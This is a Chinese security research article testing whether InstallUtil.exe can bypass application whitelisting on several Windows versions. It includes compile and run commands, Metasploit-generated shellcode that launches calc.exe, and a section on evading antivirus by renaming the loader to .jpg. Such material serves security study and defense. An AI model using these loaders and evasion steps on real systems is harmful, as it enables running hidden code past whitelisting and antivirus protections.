0161-利用白名单绕过限制的更多测试

# 利用白名单绕过限制的更多测试

0x00 前言
=======

* * *

subTee在博客中不仅介绍了如何利用InstallUtil.exe直接执行pe文件，还提到了另一种利用方式——**利用InstallUtil执行shellcode**从subTee分享的代码可以看出其测试环境为64位、.net4.0环境，在360安全播报上发表的文章也认为执行环境必须是.net4.0以上，适用范围很窄**但我并不这么认为**

下面我们通过实际测试得出我们的新结论。

注：上述涉及的链接：

* [http://subt0x10.blogspot.hk/2015/08/application-whitelisting-bypasses-101.html](http://subt0x10.blogspot.hk/2015/08/application-whitelisting-bypasses-101.html)
* [http://bobao.360.cn/learning/detail/620.html](http://bobao.360.cn/learning/detail/620.html)

0x01 测试目标
=========

* * *

测试两种利用InstallUtil的方式，研究其使用环境

0x02 测试环境
=========

* * *

“`
xp x86
win7 x86
win7 x64
win8 x86
win8 x64

“`

0x03 测试方法
=========

* * *

1、利用InstallUtil.exe执行pe文件
————————-

执行代码：

“`
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

“`

**注**：上篇有详细介绍，本次不做具体介绍

2、利用InstallUtil.exe直接执行shellcode
——————————–

下载链接：[https://gist.github.com/subTee/a06d4ae23e2517566c52](https://gist.github.com/subTee/a06d4ae23e2517566c52)

下载文件保存为Shellcode.cs，按照其描述执行代码：

“`
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

0x04 实际测试
=========

* * *

**注**：根据不同操作系统版本，需要对上述利用代码作相应修改

1、xp x86
——–

默认不包含.net环境，暂不测试，但可为最终结论提供参考

2、win7 x86
———-

默认.net环境

如图


**（1）**利用InstallUtil.exe执行pe文件

.net 3.5无法成功编译PELoader.cs

如图


**（2）**利用InstallUtil.exe直接执行shellcode

通过msf生成32位shellcode

“`
use windows/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp

“`

如图


“`
byte[] buf = new byte[195] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };

“`

替换Shellcode.cs中的byte[] shellcode

使用.net 2.0中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

成功执行shellcode，弹出计算器

如图


360成功查杀，如图


2、win7 x64
———-

默认.net环境

如图


**（1）**利用InstallUtil.exe执行pe文件

.net 3.5无法成功编译PELoader.cs

**（2）**利用InstallUtil.exe直接执行shellcode

通过msf生成64位shellcode

“`
use windows/x64/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp

“`

如图


“`
byte[] buf = new byte[276] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00 };

“`

替换Shellcode.cs中的byte[] shellcode

使用.net 2.0 x64中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

成功执行shellcode，弹出计算器

如图


如果使用.net 2.0 x86中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

会报错，如图


测试exeshellx64.exe查杀情况，360干的不错，查杀，如图


3、win8 x86
———-

默认.net环境，支持4.0

如图


**（1）**利用InstallUtil.exe执行pe文件

执行代码：

“`
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

“`

32位系统下执行发生异常

如图


**（2）**利用InstallUtil.exe直接执行shellcode

使用.net 4.0中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

成功执行shellcode，弹出计算器

如图


测试win8x86exeshell.exe查杀情况，360干的漂亮，查杀，如图


4、win8 x64
———-

默认.net环境，支持4.0，如图


**（1）**利用InstallUtil.exe执行pe文件

.net 4.0成功执行

如图


**（2）**利用InstallUtil.exe直接执行shellcode

使用.net 4.0 x64中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

报错，如图


使用.net 4.0 x86中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

报错，如图


为了得出正确的结论，在win8 x64系统上面安装.net framework x64 2.0

使用其中的csc.exe和InstallUtil.exe，执行代码：

“`
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

“`

成功执行shellcode，弹出计算器

如图


0x05 补充
=======

* * *

上述测试中操作系统自带的.net环境并不绝对，如果安装应用 也会默认安装相应版本的.net 环境

0x06 测试结论
=========

* * *

（1）利用InstallUtil.exe执行pe文件
————————–

适用于64位系统、Microsoft .NET Framework 4.0环境

（2）利用InstallUtil.exe直接执行shellcode
———————————

适用于.NET Framework 2.0及特定环境

0x07 关于免杀
=========

* * *

仅给出一种简单有效的方法

参照上篇内容的思路，执行代码如下：

“`
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.jpg Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.jpg

“`

更改文件后缀名即可逃过静态查杀，至于主动防御，全过程依然未触发

如图


正常打开是一张损坏的图片

查杀测试如图


但实际上，可以通过这种方式打开，如图


0x08 小结
=======

* * *

关于该项技术的利用方式还有很多，思路最重要

关于突破白名单的限制，其他方法比如利用PowerShell、Exploit/Migrate、WMI Providers、.COM代理突破白名单的限制的方法都很值得研究。

本文由三好学生原创并首发于乌云drops，转载请注明